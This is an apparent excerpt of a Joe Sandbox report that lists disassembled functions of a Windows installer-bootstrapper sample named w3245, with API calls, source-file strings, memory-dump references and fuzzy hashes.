                                                                                                                                                                    • Instruction ID: 3e52c4ad8c0ca2d905ea45ce88828d21a768cd562c936bf605c20cdf73a43927
                                                                                                                                                                    • Opcode Fuzzy Hash: 793a9561ad629c099dab8a3f38adb7ab069b8c22a6f87b0d2937c0838527a4bd
                                                                                                                                                                    • Instruction Fuzzy Hash: 27014B35649216FBDB201AA98809F7A76DCAF92B64F108665FD44AB381C6B4CE009691
                                                                                                                                                                    Function 009468B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0094690F
                                                                                                                                                                      • Part of subcall function 00948713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00948820
                                                                                                                                                                      • Part of subcall function 00948713: GetLastError.KERNEL32 ref: 0094882A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                                    • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                                                                                                                                    • API String ID: 211557998-1658759192
                                                                                                                                                                    • Opcode ID: 0d8e225a0d9d345308918b7cda6854e799903db32ecee3956e56da8ed94532dd
                                                                                                                                                                    • Instruction ID: 87e7b0f3c9de08a02afd7ce8f77003f9d1c978f5c495c44d114743c3a2507b9b
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d8e225a0d9d345308918b7cda6854e799903db32ecee3956e56da8ed94532dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 4201A2F190122AFB8B209F99C841C9AFBA8EB46364B60817AF504A7210C3719E10D7D1
                                                                                                                                                                    Function 0091ECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0091ECED
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091ECF7
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091ED1B
                                                                                                                                                                    • Failed to post elevate message., xrefs: 0091ED25
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                                    • API String ID: 2609174426-4098423239
                                                                                                                                                                    • Opcode ID: 96cd4d337e3c9aa49b99eb2b270d12bc6b62080c28f732643532f63b87adaea7
                                                                                                                                                                    • Instruction ID: 305f9fafd77404f2bfcec20ab6d822b6d780626b0aef02aecc28554acb371f47
                                                                                                                                                                    • Opcode Fuzzy Hash: 96cd4d337e3c9aa49b99eb2b270d12bc6b62080c28f732643532f63b87adaea7
                                                                                                                                                                    • Instruction Fuzzy Hash: 47F0F63BB40239ABC7205A99AC09FC67B88AF40B31B258224FF14AF1D1D765CC01C3D4
                                                                                                                                                                    Function 0090D8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0090D903
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,009048D7,00000000,?,?,0090548E,?,?), ref: 0090D912
                                                                                                                                                                    • GetLastError.KERNEL32(?,009048D7,00000000,?,?,0090548E,?,?), ref: 0090D91C
                                                                                                                                                                    Strings
                                                                                                                                                                    • BootstrapperApplicationDestroy, xrefs: 0090D8FB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                    • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                    • API String ID: 1144718084-3186005537
                                                                                                                                                                    • Opcode ID: b643a21dbb92210331b75ea03b4d8b9c28b9a46ac0b0888aec14cab53006f9cf
                                                                                                                                                                    • Instruction ID: ecbfa3ca66914cb7ee3875bf5e1c40c5a47296d9cac632a910841498399f3c60
                                                                                                                                                                    • Opcode Fuzzy Hash: b643a21dbb92210331b75ea03b4d8b9c28b9a46ac0b0888aec14cab53006f9cf
                                                                                                                                                                    • Instruction Fuzzy Hash: FCF06832616726AFC3204FAAD804F16F7A8BF457627018229E825D6560D761EC10DBD0
                                                                                                                                                                    Function 009431EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943200
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00943230
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: 3d99446cd033271a4f9c78bdc1542a22660cde97437490ff5bd9f06772a27d21
                                                                                                                                                                    • Instruction ID: 9b80876dfda06fcbb9fd3f32b4c14947bcc83214f17a2373ce9ad23c9622286e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d99446cd033271a4f9c78bdc1542a22660cde97437490ff5bd9f06772a27d21
                                                                                                                                                                    • Instruction Fuzzy Hash: 63F0E235102655EBC7310FA59C08F6B77ACAF81B60F24C029FC186B210C7B4CE1097E0
                                                                                                                                                                    Function 00943498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009434AD
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009434DD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: a3c342cba8bd8d8658ad3b1e25075bb24369256254f54ee30c875fb730077dd5
                                                                                                                                                                    • Instruction ID: 92255df4fed2def88716361d4c873145bd63d2fb12eadb8a9400a7028800898f
                                                                                                                                                                    • Opcode Fuzzy Hash: a3c342cba8bd8d8658ad3b1e25075bb24369256254f54ee30c875fb730077dd5
                                                                                                                                                                    • Instruction Fuzzy Hash: EEF05E35241215ABCB335F69AC09E9B7BACAB82B61F15C11AFC099B260C775DE10D6E0
                                                                                                                                                                    Function 0091F2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0091F2EE
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091F2F8
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F31C
                                                                                                                                                                    • Failed to post plan message., xrefs: 0091F326
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                                    • API String ID: 2609174426-2952114608
                                                                                                                                                                    • Opcode ID: 49579dbfc828159bdad07bdd288d9c489f8774d309c487a4231fdb11a188b1c2
                                                                                                                                                                    • Instruction ID: 34b2dd738c65be038f0e982b370a753740b81ea42efad3ec3be021bfc0be58b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 49579dbfc828159bdad07bdd288d9c489f8774d309c487a4231fdb11a188b1c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 70F0A7377552396BD6206AA65C09E8B7F88EF45BB1B018121BE54AB191E660DC0192D4
                                                                                                                                                                    Function 0091F3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0091F3FC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091F406
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F42A
                                                                                                                                                                    • Failed to post shutdown message., xrefs: 0091F434
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                    • API String ID: 2609174426-188808143
                                                                                                                                                                    • Opcode ID: 2ab9ca1ec6a95e71d0a6ca8361bbd3ca827cf75010b65b7fa69c44782103e437
                                                                                                                                                                    • Instruction ID: 10318792afbc9b88f70b0b253b911eedd0503262bb6fcc7ac8fec41489c7428d
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab9ca1ec6a95e71d0a6ca8361bbd3ca827cf75010b65b7fa69c44782103e437
                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0A73775523967D7315A966C0DF877B98AF44B61B014021BE14BB1E1E660DC0087D5
                                                                                                                                                                    Function 009207B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(0094B478,00000000,?,00921717,?,00000000,?,0090C287,?,00905405,?,009175A5,?,?,00905405,?), ref: 009207BF
                                                                                                                                                                    • GetLastError.KERNEL32(?,00921717,?,00000000,?,0090C287,?,00905405,?,009175A5,?,?,00905405,?,00905445,00000001), ref: 009207C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set begin operation event., xrefs: 009207F7
                                                                                                                                                                    • cabextract.cpp, xrefs: 009207ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorEventLast
                                                                                                                                                                    • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3848097054-4159625223
                                                                                                                                                                    • Opcode ID: 5f3c8c86436db6622786477308e507f8ed86253bcc778b14a8e02c80ddafcc90
                                                                                                                                                                    • Instruction ID: 563f4bfe9776f00ae4217c553eca306a4e0a5760688e1805fe5fa641eaad318e
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f3c8c86436db6622786477308e507f8ed86253bcc778b14a8e02c80ddafcc90
                                                                                                                                                                    • Instruction Fuzzy Hash: E4F05C3764223167832062A67C05F8F7A8C9F81B717010121FF00B7141E660EC10C3D5
                                                                                                                                                                    Function 0091EBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0091EBE0
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091EBEA
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091EC0E
                                                                                                                                                                    • Failed to post apply message., xrefs: 0091EC18
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                    • API String ID: 2609174426-1304321051
                                                                                                                                                                    • Opcode ID: ce0c178c4934c47da41cc73f5f3018066f889f0d5db9e361c9eba84107dca33b
                                                                                                                                                                    • Instruction ID: 1ee2d0cca5d2919bd25d27688377d4b0b756de4999b3043970a50b59d48c1493
                                                                                                                                                                    • Opcode Fuzzy Hash: ce0c178c4934c47da41cc73f5f3018066f889f0d5db9e361c9eba84107dca33b
                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0A737B5123967D6215A965C0DE8BBF88AF45B71B028010FE58AB191D660DC0092D4
                                                                                                                                                                    Function 0091EC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0091EC71
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091EC7B
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091EC9F
                                                                                                                                                                    • Failed to post detect message., xrefs: 0091ECA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                    • API String ID: 2609174426-598219917
                                                                                                                                                                    • Opcode ID: 5b374d06d4cf94b8b367bc84eccf720a55bbce7f4097f0f7aae9d06f15fc63e4
                                                                                                                                                                    • Instruction ID: acf5d39745a4ff90646102359ac542fe1f0c51d50623bbfba9239df44f39bc84
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b374d06d4cf94b8b367bc84eccf720a55bbce7f4097f0f7aae9d06f15fc63e4
                                                                                                                                                                    • Instruction Fuzzy Hash: 10F0A7377412356BD7305A966C09F877F98AF45BB1B028011BE54AB191E660DC00D2D4
                                                                                                                                                                    Function 00936B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                    • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                                    • Instruction ID: 66110eb9cf6f9a9e97c007acb8bcbe6592355ca70a616a4b478906a3761ac094
                                                                                                                                                                    • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                                    • Instruction Fuzzy Hash: 7FA14776A00386AFDB21CF28C8817AEBFE9EF51310F1485ADE5959B281C7389D45CF51
                                                                                                                                                                    Function 00945EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: dlutil.cpp
                                                                                                                                                                    • API String ID: 1659193697-2067379296
                                                                                                                                                                    • Opcode ID: e6bdb85efa6f8475be5da01d32fc15f58fa566c41d68d0f4881cfee2878c2cb6
                                                                                                                                                                    • Instruction ID: 95b93102a9a7131a6efa7db5cfad0a2a3abc0f54fd73e2b4696d4fa20ad1145a
                                                                                                                                                                    • Opcode Fuzzy Hash: e6bdb85efa6f8475be5da01d32fc15f58fa566c41d68d0f4881cfee2878c2cb6
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51C072901619ABDB219FE58C84EAFBBBDEF88710F164059FD00B7241D771DD409BA1
                                                                                                                                                                    Function 0093922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,00932444,00000000,00000000,00933479,?,00933479,?,00000001,00932444,ECE85006,00000001,00933479,00933479), ref: 00939278
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00939301
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00939313
                                                                                                                                                                    • __freea.LIBCMT ref: 0093931C
                                                                                                                                                                      • Part of subcall function 0093521A: HeapAlloc.KERNEL32(00000000,?,?,?,00931F87,?,0000015D,?,?,?,?,009333E0,000000FF,00000000,?,?), ref: 0093524C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 573072132-0
                                                                                                                                                                    • Opcode ID: 18ec78d9646e0ca0a36847ca88ff4c1d21b76c8bd1527a8c87c09712ae0b31f3
                                                                                                                                                                    • Instruction ID: 9fadb31ce09e7230183f19de0d243b87c945faca173e645bf6c8462dd48e9998
                                                                                                                                                                    • Opcode Fuzzy Hash: 18ec78d9646e0ca0a36847ca88ff4c1d21b76c8bd1527a8c87c09712ae0b31f3
                                                                                                                                                                    • Instruction Fuzzy Hash: A331CD72A1421AABDF249F64DC81EAF7BA9EB44710F050128FC14DB195E775CD91CFA0
                                                                                                                                                                    Function 00904FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,?,00905552,?,?,?,?,?,?), ref: 00904FFE
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00905552,?,?,?,?,?,?), ref: 00905012
                                                                                                                                                                    • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00905552,?,?), ref: 00905101
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00905552,?,?), ref: 00905108
                                                                                                                                                                      • Part of subcall function 00901161: LocalFree.KERNEL32(?,?,00904FBB,?,00000000,?,00905552,?,?,?,?,?,?), ref: 0090116B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3671900028-0
                                                                                                                                                                    • Opcode ID: c8347b1045714d77cf92b3765f90191aa94dabbccab2bf4761e9cb32409da923
                                                                                                                                                                    • Instruction ID: f4e91db88aa6b1f9206d98718eff4a8fe89cf3a284132f4cd6d66b658668e727
                                                                                                                                                                    • Opcode Fuzzy Hash: c8347b1045714d77cf92b3765f90191aa94dabbccab2bf4761e9cb32409da923
                                                                                                                                                                    • Instruction Fuzzy Hash: 3841B8B1600B05ABDA70EBB4D849F9B73ECAF44340F454929B69AD3091EB34F545CB64
                                                                                                                                                                    Function 00904C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
